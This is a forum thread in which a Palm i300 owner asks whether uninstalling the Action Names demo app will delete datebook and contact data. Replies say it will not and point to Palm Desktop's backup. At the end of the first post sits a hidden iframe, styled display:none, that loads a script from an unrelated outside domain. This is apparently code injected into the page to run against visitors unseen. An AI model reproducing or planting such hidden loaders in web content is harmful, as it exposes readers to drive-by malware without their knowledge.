+ Reply to Thread

uninstalling Action Names

Hi,
    This is a very trivial question but gives me a scare. hence need your help.

I am trying to delete the Action Names application from my I300. It was a demo app. and I decided not to upgrade.
    Anyways, when I choose to delete, the usual warning message appears, "This will delete the application and all data. Do you wish to continue" ..

What scares me is, will it delete all the datebook data? i.e. contacts/calendar etc.
    I know that Action Names actually writes and updates the data in datebook application, which helps in unobtrusive syncing using hotsync.

Most likely, this delete process will leave the contact etc. data untouched. But I want to be sure before syncing!!!

thanks for your help<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You shouldn't have any problems to my knowledge.... I can't think of any data that would be in ActionNames that wouldn't also be in either datebook or addressbook. Besides...you always have a backup on your PC just in case. Are you using the latest version of desktop?

thanks for the reply. I have the desktop 4.0.1. I have been syncing with yahoo account using the intellisync druids in hotsync. Works fine. Never had to work on the desktop though. I think I should keep a memory dump of the i300 data into PC. What is the best way?

If using desktop 4.0 the PC does that already under Palm Backup...

thank you very much .